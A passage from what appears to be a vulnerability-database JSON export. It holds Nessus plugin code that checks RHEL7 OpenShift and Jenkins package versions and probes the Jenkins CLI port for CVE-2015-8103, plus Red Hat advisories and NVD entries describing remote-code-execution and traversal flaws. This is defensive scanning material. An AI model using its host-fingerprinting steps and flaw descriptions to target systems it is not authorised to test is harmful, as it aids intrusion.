&& rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-node-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-pod-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-pod-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-recycle-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-recycle-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-sdn-ovs-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"atomic-openshift-sdn-ovs-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"atomic-openshift-utils-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"atomic-openshift-utils-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"heapster-0.18.2-3.gitaf4752e.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jenkins-1.625.3-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-align-text-0.1.3-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-ansi-green-0.1.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-ansi-wrap-0.1.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-anymatch-1.3.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-arr-diff-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-arr-flatten-1.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-array-unique-0.2.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-arrify-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-async-each-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", 
reference:\"nodejs-binary-extensions-1.3.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-braces-1.8.2-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-capture-stack-trace-1.0.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-chokidar-1.4.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-configstore-1.4.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-create-error-class-2.0.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-deep-extend-0.3.2-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-duplexer-0.1.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-duplexify-3.4.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-end-of-stream-1.1.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-error-ex-1.2.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-es6-promise-3.0.2-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-event-stream-3.3.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-expand-brackets-0.1.4-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-expand-range-1.8.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-extglob-0.3.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-filename-regex-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-fill-range-2.2.3-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-for-in-0.1.4-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-for-own-0.1.3-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-from-0.1.3-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-glob-base-0.3.0-1.el7aos\")) 
flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-glob-parent-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-got-5.2.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-graceful-fs-4.1.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-ini-1.1.0-6.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-binary-path-1.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-dotfile-1.0.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-equal-shallow-0.1.3-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-extendable-0.1.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-extglob-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-glob-2.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-npm-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-number-2.1.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-plain-obj-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-primitive-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-redirect-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-is-stream-1.0.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-isobject-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-kind-of-3.0.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-latest-version-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lazy-cache-1.0.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.assign-3.2.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", 
reference:\"nodejs-lodash.baseassign-3.2.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.basecopy-3.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.bindcallback-3.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.createassigner-3.1.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.defaults-3.1.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.getnative-3.9.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.isarguments-3.0.4-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.isarray-3.0.4-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.isiterateecall-3.0.9-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.keys-3.1.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lodash.restparam-3.6.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-lowercase-keys-1.0.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-map-stream-0.1.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-micromatch-2.3.5-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-mkdirp-0.5.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-node-status-codes-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-nodemon-1.8.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-normalize-path-2.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-object-assign-4.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-object.omit-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-optimist-0.4.0-5.el7aos\")) flag++;\n if 
(rpm_check(release:\"RHEL7\", reference:\"nodejs-os-homedir-1.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-os-tmpdir-1.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-osenv-0.1.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-package-json-2.3.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-parse-glob-3.0.4-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-parse-json-2.2.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-pause-stream-0.0.11-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-pinkie-2.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-pinkie-promise-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-prepend-http-1.0.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-preserve-0.2.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-ps-tree-1.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-randomatic-1.1.5-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-rc-1.1.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-read-all-stream-3.0.1-3.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-readdirp-2.0.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-regex-cache-0.4.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-registry-url-3.0.3-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-repeat-element-1.1.2-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-semver-5.1.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-semver-diff-2.1.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", 
reference:\"nodejs-slide-1.1.5-3.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-split-0.3.3-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-stream-combiner-0.2.1-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-string-length-1.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-strip-json-comments-1.0.2-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-success-symbol-0.1.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-through-2.3.4-4.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-timed-out-2.0.0-3.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-touch-1.0.0-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-undefsafe-0.0.3-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-unzip-response-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-update-notifier-0.6.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-url-parse-lax-1.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-uuid-2.0.1-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-write-file-atomic-1.1.2-2.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"nodejs-xdg-basedir-2.0.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"nss_wrapper-1.0.3-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"nss_wrapper-debuginfo-1.0.3-1.el7\")) flag++;\n if (rpm_exists(rpm:\"openshift-ansible-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"openshift-ansible-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"openshift-ansible-docs-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", 
reference:\"openshift-ansible-docs-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"openshift-ansible-filter-plugins-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"openshift-ansible-filter-plugins-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"openshift-ansible-lookup-plugins-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"openshift-ansible-lookup-plugins-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"openshift-ansible-playbooks-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"openshift-ansible-playbooks-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_exists(rpm:\"openshift-ansible-roles-3.0\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", reference:\"openshift-ansible-roles-3.0.35-1.git.0.6a386dd.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openvswitch-2.4.0-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openvswitch-debuginfo-2.4.0-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openvswitch-devel-2.4.0-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"openvswitch-test-2.4.0-1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"origin-kibana-0.5.0-1.el7aos\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"python-openvswitch-2.4.0-1.el7\")) flag++;\n if (rpm_exists(rpm:\"tuned-profiles-atomic-openshift-node-3.1\", release:\"RHEL7\") && rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tuned-profiles-atomic-openshift-node-3.1.1.6-1.git.0.b57e8bd.el7aos\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"atomic-openshift / 
atomic-openshift-clients / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T02:48:06", "bulletinFamily": "scanner", "description": "The remote web server hosts a version of Jenkins or Jenkins Enterprise\nthat is prior to 1.638 or 1.625.2. It is, therefore, affected by a\nflaw in the Apache Commons Collections (ACC) library that allows the\ndeserialization of unauthenticated Java objects. An unauthenticated,\nremote attacker can exploit this to execute arbitrary code on the\ntarget host.", "modified": "2019-11-02T00:00:00", "id": "JENKINS_SECURITY218.NASL", "href": "https://www.tenable.com/plugins/nessus/86898", "published": "2015-11-17T00:00:00", "title": "Jenkins < 1.638 / 1.625.2 Java Object Deserialization RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86898);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/20\");\n\n script_cve_id(\"CVE-2015-8103\");\n script_bugtraq_id(77636);\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"Jenkins < 1.638 / 1.625.2 Java Object Deserialization RCE\");\n script_summary(english:\"Checks the Jenkins version, and if necessary, tests if the CLI port is enabled.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server hosts a version of Jenkins or Jenkins Enterprise\nthat is prior to 1.638 or 1.625.2. It is, therefore, affected by a\nflaw in the Apache Commons Collections (ACC) library that allows the\ndeserialization of unauthenticated Java objects. 
An unauthenticated,\nremote attacker can exploit this to execute arbitrary code on the\ntarget host.\");\n # https://jenkins-ci.org/content/mitigating-unauthenticated-remote-code-execution-0-day-jenkins-cli\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0316bc02\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/jenkinsci-cert/SECURITY-218\");\n script_set_attribute(attribute:\"see_also\", value:\"https://issues.apache.org/jira/browse/COLLECTIONS-580\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Jenkins version 1.638 / 1.625.2 or later. Alternatively,\ndisable the CLI port per the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8103\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenNMS Java Object Unserialization Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/11\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cloudbees:jenkins\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"jenkins_detect.nasl\");\n script_require_keys(\"www/Jenkins\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\nget_kb_item_or_exit(\"www/Jenkins/\"+port+\"/Installed\");\n\n# LTS has a different version number\nis_LTS = get_kb_item(\"www/Jenkins/\"+port+\"/is_LTS\");\nif (is_LTS)\n{\n appname = \"Jenkins Open Source LTS\";\n fixed = \"1.625.2\";\n}\nelse\n{\n appname = \"Jenkins Open Source\";\n fixed = \"1.638\";\n}\n\n# check the patched versions\nversion = get_kb_item_or_exit(\"www/Jenkins/\"+port+\"/JenkinsVersion\");\nif (version == \"unknown\") audit(AUDIT_UNKNOWN_APP_VER, appname);\nif (ver_compare(ver: version, fix: fixed, strict: FALSE) >= 0) audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n\n# if the version is less than the patch version then check to see if the CLI port is enabled\nurl = build_url(qs:'/', port: port);\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\nif ((\"X-Jenkins-CLI-Port\" >!< res[1]) &&\n (\"X-Jenkins-CLI2-Port\" >!< res[1]) &&\n (\"X-Hudson-CLI-Port\" >!< res[1])) audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n\n# Find a CLI port to examine\nitem = eregmatch(pattern:\"X-Jenkins-CLI-Port:\\s*([0-9]+)[ \\r\\n]\", string: res[1]);\nif (isnull(item))\n{\n item = eregmatch(pattern:\"X-Hudson-CLI-Port:\\s*([0-9]+)[ \\r\\n]\", string: res[1]);\n if 
(isnull(item))\n {\n item = eregmatch(pattern:\"X-Jenkins-CLI2-Port:\\s*([0-9]+)[ \\r\\n]\", string: res[1]);\n if (isnull(item)) audit(AUDIT_RESP_BAD, port);\n }\n}\n\nsock = open_sock_tcp(item[1]);\nif (!sock) audit(AUDIT_NOT_LISTEN, appname, item[1]);\n\nsend(socket: sock, data: '\\x00\\x14' + \"Protocol:CLI-connect\");\nreturn_val = recv(socket: sock, length: 20, min: 9, timeout: 1);\nclose(sock);\n\nif (isnull(return_val) || len(return_val) < 9) audit(AUDIT_RESP_BAD, res[1]);\nif (\"Unknown protocol:\" >< return_val) audit(AUDIT_INST_VER_NOT_VULN, appname, version);\nelse if (\"Welcome\" >!< return_val) audit(AUDIT_RESP_BAD, res[1]);\n\nif (report_verbosity > 0)\n{ \n report =\n '\\n Port : ' + item[1] +\n '\\n Product : ' + appname +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_hole(port: item[1], extra: report);\n}\nelse security_hole(item[1]);\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2016-03-23T16:40:08", "bulletinFamily": "unix", "description": "OpenShift Enterprise by Red Hat is the company's cloud computing\nPlatform-as-a-Service (PaaS) solution designed for on-premise or\nprivate cloud deployments.\n\nThe following security issue is addressed with this release:\n\nIt was found that ActiveMQ did not safely handle user supplied data \nwhen deserializing objects. A remote attacker could use this flaw to \nexecute arbitrary code with the permissions of the ActiveMQ \napplication. (CVE-2015-5254)\n\nAn update for Jenkins Continuous Integration Server that addresses a \nlarge number of security issues, including XSS, CSRF, information \ndisclosure and code execution, is included as well. 
\n(CVE-2015-5317, CVE-2015-5318, CVE-2015-5319, CVE-2015-5320, \nCVE-2015-5321, CVE-2015-5322, CVE-2015-5323, CVE-2015-5324, \nCVE-2015-5325, CVE-2015-5326, CVE-2015-7537, CVE-2015-7538, \nCVE-2015-7539, CVE-2015-8103)\n\nSpace precludes documenting all of the bug fixes in this advisory. See\nthe OpenShift Enterprise Technical Notes, which will be updated\nshortly for release 2.2.9, for details about these changes:\n\nhttps://access.redhat.com/documentation/en-US/OpenShift_Enterprise/2/html-single/Technical_Notes/index.html\n\nAll OpenShift Enterprise 2 users are advised to upgrade to these \nupdated packages.\n", "modified": "2016-03-23T19:16:50", "published": "2016-01-11T05:00:00", "id": "RHSA-2016:22381", "href": "https://access.redhat.com/errata/RHSA-2016:22381", "type": "redhat", "title": "(RHSA-2016:22381) Important: Red Hat OpenShift Enterprise 2.2.9 security, bug fix, and enhancement update", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-08-13T18:45:05", "bulletinFamily": "unix", "description": "OpenShift Enterprise by Red Hat is the company's cloud computing\nPlatform-as-a-Service (PaaS) solution designed for on-premise or\nprivate cloud deployments.\n\nThe following security issue is addressed with this release:\n\nIt was found that ActiveMQ did not safely handle user supplied data \nwhen deserializing objects. A remote attacker could use this flaw to \nexecute arbitrary code with the permissions of the ActiveMQ \napplication. (CVE-2015-5254)\n\nAn update for Jenkins Continuous Integration Server that addresses a \nlarge number of security issues, including XSS, CSRF, information \ndisclosure and code execution, is included as well. 
\n(CVE-2015-5317, CVE-2015-5318, CVE-2015-5319, CVE-2015-5320, \nCVE-2015-5321, CVE-2015-5322, CVE-2015-5323, CVE-2015-5324, \nCVE-2015-5325, CVE-2015-5326, CVE-2015-7537, CVE-2015-7538, \nCVE-2015-7539, CVE-2015-8103)\n\nSpace precludes documenting all of the bug fixes in this advisory. See\nthe OpenShift Enterprise Technical Notes, which will be updated\nshortly for release 2.2.9, for details about these changes:\n\nhttps://access.redhat.com/documentation/en-US/OpenShift_Enterprise/2/html-single/Technical_Notes/index.html\n\nAll OpenShift Enterprise 2 users are advised to upgrade to these \nupdated packages.\n", "modified": "2018-06-07T08:58:09", "published": "2016-03-22T04:00:00", "id": "RHSA-2016:0489", "href": "https://access.redhat.com/errata/RHSA-2016:0489", "type": "redhat", "title": "(RHSA-2016:0489) Important: Red Hat OpenShift Enterprise 2.2.9 security, bug fix, and enhancement update", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:52", "bulletinFamily": "unix", "description": "OpenShift Enterprise by Red Hat is the company's cloud computing \nPlatform-as-a-Service (PaaS) solution designed for on-premise or \nprivate cloud deployments.\n\nThe following security issues are addressed with this release:\n\nAn authorization flaw was discovered in Kubernetes; the API server \ndid not properly check user permissions when handling certain \nrequests. An authenticated remote attacker could use this flaw to \ngain additional access to resources such as RAM and disk space. \n(CVE-2016-1905)\n\nAn authorization flaw was discovered in Kubernetes; the API server \ndid not properly check user permissions when handling certain build-\nconfiguration strategies. A remote attacker could create build \nconfigurations with strategies that violate policy. 
Although the \nattacker could not launch the build themselves (launch fails when \nthe policy is violated), if the build configuration files were later \nlaunched by other privileged services (such as automated triggers), \nuser privileges could be bypassed allowing attacker escalation. \n(CVE-2016-1906)\n\nAn update for Jenkins Continuous Integration Server that addresses a \nlarge number of security issues, including XSS, CSRF, information \ndisclosure and code execution, is included as well. \n(CVE-2013-2186, CVE-2014-1869, CVE-2014-3661, CVE-2014-3662,\nCVE-2014-3663, CVE-2014-3664, CVE-2014-3666, CVE-2014-3667,\nCVE-2014-3680, CVE-2014-3681, CVE-2015-1806, CVE-2015-1807,\nCVE-2015-1808, CVE-2015-1810, CVE-2015-1812, CVE-2015-1813,\nCVE-2015-1814, CVE-2015-5317, CVE-2015-5318, CVE-2015-5319,\nCVE-2015-5320, CVE-2015-5321, CVE-2015-5322, CVE-2015-5323,\nCVE-2015-5324, CVE-2015-5325, CVE-2015-5326, CVE-2015-7537,\nCVE-2015-7538, CVE-2015-7539, CVE-2015-8103)\n\nSpace precludes documenting all of the bug fixes and enhancements in \nthis advisory. 
See the OpenShift Enterprise 3.1 Release Notes, which \nwill be updated shortly for release 3.1.1, for details about these \nchanges:\n\nhttps://docs.openshift.com/enterprise/3.1/release_notes/ose_3_1_release_notes.html\n\nAll OpenShift Enterprise 3 users are advised to upgrade to these \nupdated packages.", "modified": "2016-01-27T00:08:42", "published": "2016-01-27T00:01:15", "id": "RHSA-2016:0070", "href": "https://access.redhat.com/errata/RHSA-2016:0070", "type": "redhat", "title": "(RHSA-2016:0070) Important: Red Hat OpenShift Enterprise 3.1.1 bug fix and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in Jenkins before 1.638 and LTS before 1.625.2 allows remote attackers to list directory contents and read arbitrary files in the Jenkins servlet resources via directory traversal sequences in a request to jnlpJars/.", "modified": "2016-06-14T00:49:00", "id": "CVE-2015-5322", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5322", "published": "2015-11-25T20:59:00", "title": "CVE-2015-5322", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:14:43", "bulletinFamily": "NVD", "description": "Jenkins before 1.638 and LTS before 1.625.2 do not properly restrict access to API tokens which might allow remote administrators to gain privileges and run scripts by using an API token of another user.", "modified": "2016-06-14T00:48:00", "id": "CVE-2015-5323", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5323", "published": "2015-11-25T20:59:00", "title": "CVE-2015-5323", "type": "cve", "cvss": {"score": 6.5, "vector": 